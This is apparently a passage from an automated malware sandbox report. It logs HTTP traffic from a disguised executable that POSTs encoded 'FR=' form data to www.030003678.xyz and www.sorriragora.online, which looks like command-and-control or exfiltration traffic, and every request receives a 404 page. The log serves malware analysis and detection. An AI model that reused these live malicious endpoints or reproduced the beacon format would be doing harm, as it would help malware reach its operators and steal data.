              Data Ascii: FR=VRMqz/UyqXREyLF5qx9RJolg/oPQxUTZrxpe3sbxMIO3mdq/LOhVCCxUAMxwaF1UIXrxNbMAxdvclubFLPXAvLQOkaY1Eu3rfylHtEpp+rYJJ3CjAE5+b/zB0ZtHlXhbC8K6P69A/CQhba7tev525k/L5wuHV1LQlOk4Dw6/iOpAuowLsjIpSTE4sLUgprL10x3s8alsx41+um7qo4dvwXjuDg9fK6BVxw==
              Sep 6, 2024 09:05:16.457181931 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:16 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.64972865.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:18.334827900 CEST1831OUTPOST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 56 52 4d 71 7a 2f 55 79 71 58 52 45 79 4c 46 35 71 78 39 52 4a 6f 6c 67 2f 6f 50 51 78 55 54 5a 72 78 70 65 33 73 62 78 4d 49 32 33 6d 75 53 2f 4e 74 4a 56 44 43 78 55 44 4d 78 78 61 46 30 45 49 58 6a 31 4e 62 42 39 78 66 58 63 6c 4d 6a 46 4e 37 44 41 38 72 51 4f 35 4b 59 77 4c 4f 32 32 66 79 31 44 74 41 31 70 2b 72 59 4a 4a 32 79 6a 4a 77 56 2b 58 66 7a 43 7a 5a 74 62 68 58 68 33 43 38 53 41 50 36 35 36 2f 7a 73 68 62 36 4c 74 4e 4d 52 32 6d 55 2f 4a 38 77 75 66 56 31 50 4c 6c 50 49 65 44 78 4f 42 69 4a 68 41 2f 76 78 50 39 6a 55 6c 52 44 73 4a 77 49 6b 61 73 64 33 46 79 68 76 51 31 5a 70 62 79 4d 74 56 76 69 4c 6f 70 59 56 70 6d 57 65 48 4d 6e 6f 44 4b 37 6b 73 70 4d 4e 73 51 5a 2b 5a 65 6a 6d 65 66 31 4e 69 32 49 4a 50 6b 57 35 66 37 70 38 36 4e 6f 6d 31 49 35 38 2b 33 45 6a 41 73 42 49 68 53 57 6f 79 68 37 48 78 36 6c 2f 58 69 47 69 4d 63 6d 69 42 67 52 30 7a 7a 2b 33 63 2f 33 43 6f 43 77 44 70 76 39 51 50 76 61 33 42 36 35 6d 57 55 33 76 4a 30 38 75 45 78 58 72 56 62 74 55 78 65 4d 36 [TRUNCATED]
              Data Ascii: FR=VRMqz/UyqXREyLF5qx9RJolg/oPQxUTZrxpe3sbxMI23muS/NtJVDCxUDMxxaF0EIXj1NbB9xfXclMjFN7DA8rQO5KYwLO22fy1DtA1p+rYJJ2yjJwV+XfzCzZtbhXh3C8SAP656/zshb6LtNMR2mU/J8wufV1PLlPIeDxOBiJhA/vxP9jUlRDsJwIkasd3FyhvQ1ZpbyMtVviLopYVpmWeHMnoDK7kspMNsQZ+Zejmef1Ni2IJPkW5f7p86Nom1I58+3EjAsBIhSWoyh7Hx6l/XiGiMcmiBgR0zz+3c/3CoCwDpv9QPva3B65mWU3vJ08uExXrVbtUxeM6+eUqy+JXHWbeWOqia+8mworFRzLeNagofpYbxXrwoODQmH/ho2Mf2gLWRPok9W0E65z7AQ1HB7jBM3trw2Iz0Z69CPgZOPEv6WbdoZRSs+NvyY76qobxR3kKpOlNbAjVntDfGVpOk3ASQS5PfWOwZpDEJensfb9OLTP2SXhSlXlY2yCq80W+3swWM+gj8xk57E6KvZtJ8WHxL7vLYUeBPMxYXnFBzxiX6d9pHaHhvcJYw7489ny45RIlnJf9LsGTbKDok3k7on9e/H7hiSGZgKLmUS39XwYzsfpKbv7FQY54u3wxB/sQQJQoufkHbageCD/o+DOqeuSX1KvggYewQkDVjoWYGoU+Qh9knFyxPwGF+XYHNsQwnYNaRAgDwwg6/Hxj56qtqLB1GtvczcEkAUp66I5YEmREXTaKZsHtdz7oG1sbPenKZQPPHJzB8RB0ITOjUjHIXRcDLZqrBO66iDXLKIDN5oOl+g+sQ8v2s3MBneM7BfpoKyCXHiNeT6KlQysST4bBZ7X7J4nvQNgaVS6cBo5JXWcuifx594hvgiOFa4Qi+feSMfkY7YfB/c2281oB983RyPLyKeiVDZEQVBNC8B5gLguBfxOT8Yu6RYyhLB68xa20IdM6cBJji/s3rWvIq+qm8NcAtT8dfhBkRyNnZKrqANWw4T [TRUNCATED]
              Sep 6, 2024 09:05:18.984230042 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:18 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.64972965.21.196.90805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:20.879736900 CEST531OUTGET /wft4/?FR=YTkKwJ8ciWwfk9EboTVmJ8A8z5nQoA6H/11M7sDGKdLnpvCCOp1eIxB3H/IGbE8NJw3dU7UJgJnjxevpFaH+9r0+hPUAaenfY1NUgmg0rJlUJj6QFUl1BdaUrKMG7GtZPuGkbd0=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.030003678.xyz
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:21.548053026 CEST1032INHTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:21 GMT
              vary: User-Agent
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.649731162.240.81.18805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:27.122359991 CEST809OUTPOST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 79 31 54 55 37 67 4c 54 34 6a 45 75 49 5a 77 6b 32 34 59 6f 32 2b 6a 34 4f 77 52 7a 33 58 39 62 71 62 67 44 42 32 68 59 6e 68 65 6b 69 6f 62 67 67 4a 57 4c 30 73 36 6a 69 45 34 7a 68 4e 31 6c 48 46 37 44 46 41 70 30 64 62 58 4a 31 77 76 6d 68 32 63 71 5a 46 73 71 76 62 75 54 6d 39 45 66 6f 45 43 52 4b 4e 54 45 46 34 66 55 39 6f 50 66 4b 34 59 66 59 42 56 77 4b 59 64 4f 2b 76 61 79 44 70 5a 4f 31 2b 37 2f 4e 6b 2f 71 76 33 38 50 50 49 6b 4b 37 33 43 39 41 79 77 4f 35 50 6c 52 6f 72 73 74 4c 68 2f 47 69 71 6b 77 6f 5a 57 68 62 6b 2b 38 78 78 39 49 58 38 6d 42 66 70 47 6f 37 5a 33 4a 6a 6b 2b 31 57 52 57 6e
              Data Ascii: FR=y1TU7gLT4jEuIZwk24Yo2+j4OwRz3X9bqbgDB2hYnhekiobggJWL0s6jiE4zhN1lHF7DFAp0dbXJ1wvmh2cqZFsqvbuTm9EfoECRKNTEF4fU9oPfK4YfYBVwKYdO+vayDpZO1+7/Nk/qv38PPIkK73C9AywO5PlRorstLh/GiqkwoZWhbk+8xx9IX8mBfpGo7Z3Jjk+1WRWn
              Sep 6, 2024 09:05:27.679925919 CEST1236INHTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:27 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:27.679946899 CEST1236INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:27.679959059 CEST1236INData Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20
              Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:27.679971933 CEST115INData Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20
              Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.649732162.240.81.18805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:29.664473057 CEST833OUTPOST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 79 31 54 55 37 67 4c 54 34 6a 45 75 61 4a 67 6b 30 62 67 6f 6d 75 6a 37 43 51 52 7a 67 48 39 58 71 62 73 44 42 33 30 46 6e 55 47 6b 69 4b 54 67 68 4b 4f 4c 35 4d 36 6a 36 30 34 79 76 74 31 73 48 46 33 68 46 42 35 30 64 62 54 4a 31 30 72 6d 68 6c 6b 72 59 56 74 4d 36 4c 75 56 70 64 45 66 6f 45 43 52 4b 4e 48 2b 46 34 33 55 2b 59 54 66 62 70 59 65 65 78 56 7a 64 6f 64 4f 30 50 61 32 44 70 59 70 31 37 6a 52 4e 6d 33 71 76 32 4d 50 50 63 4a 63 69 6e 43 42 4f 53 78 4c 33 38 55 6f 6f 4a 52 4e 4c 52 32 71 38 5a 59 4d 67 50 58 37 48 58 2b 66 6a 68 64 4b 58 2b 2b 7a 66 4a 47 43 35 5a 50 4a 78 7a 79 53 5a 6c 7a 45 37 49 43 37 56 42 38 6e 42 4d 57 51 53 73 62 73 72 78 4e 6b 6a 41 3d 3d
              Data Ascii: FR=y1TU7gLT4jEuaJgk0bgomuj7CQRzgH9XqbsDB30FnUGkiKTghKOL5M6j604yvt1sHF3hFB50dbTJ10rmhlkrYVtM6LuVpdEfoECRKNH+F43U+YTfbpYeexVzdodO0Pa2DpYp17jRNm3qv2MPPcJcinCBOSxL38UooJRNLR2q8ZYMgPX7HX+fjhdKX++zfJGC5ZPJxzySZlzE7IC7VB8nBMWQSsbsrxNkjA==
              Sep 6, 2024 09:05:30.217308998 CEST1236INHTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:30 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:30.217325926 CEST224INData Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
              Sep 6, 2024 09:05:30.217344046 CEST1236INData Raw: 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
              Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
              Sep 6, 2024 09:05:30.217359066 CEST1127INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 67 65 72 65 64 20 6d 69 73 73 69 6e
              Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.649733162.240.81.18805412C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              TimestampBytes transferredDirectionData
              Sep 6, 2024 09:05:32.211046934 CEST1846OUTPOST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Raw: 46 52 3d 79 31 54 55 37 67 4c 54 34 6a 45 75 61 4a 67 6b 30 62 67 6f 6d 75 6a 37 43 51 52 7a 67 48 39 58 71 62 73 44 42 33 30 46 6e 58 6d 6b 69 2f 66 67 67 71 79 4c 32 73 36 6a 6b 45 34 76 76 74 30 38 48 46 2f 6c 46 45 68 37 64 5a 62 4a 30 52 2f 6d 77 6b 6b 72 57 56 74 4d 34 4c 75 51 6d 39 45 4b 6f 41 65 64 4b 4e 58 2b 46 34 33 55 2b 61 6e 66 62 34 59 65 63 78 56 77 4b 59 64 4b 2b 76 61 65 44 70 52 57 31 37 76 76 4e 57 58 71 76 57 63 50 4d 70 6c 63 71 6e 43 35 50 69 78 74 33 38 59 4a 6f 4e 78 33 4c 53 72 33 38 61 45 4d 71 4a 43 33 66 32 79 6b 77 54 64 74 41 2b 47 36 54 75 2b 4b 7a 70 66 77 39 7a 75 78 57 32 61 74 2b 4e 75 33 55 53 52 6c 43 2f 53 70 4f 6f 69 30 71 46 51 4f 37 39 46 62 54 4e 50 34 6a 4d 69 65 50 7a 39 33 42 2f 45 73 6b 32 75 71 2b 4c 66 51 79 31 32 7a 4b 2f 48 6b 6d 34 74 62 43 44 67 67 57 33 52 42 53 68 56 62 55 75 71 58 4e 59 58 69 44 66 2b 54 50 44 79 51 46 30 38 37 33 73 69 6d 30 75 65 74 7a 77 41 4a 30 6f 68 70 2f 71 61 77 4c 74 55 6e 68 51 43 4a 57 72 48 4b 4d 4a 65 63 38 53 4c [TRUNCATED]
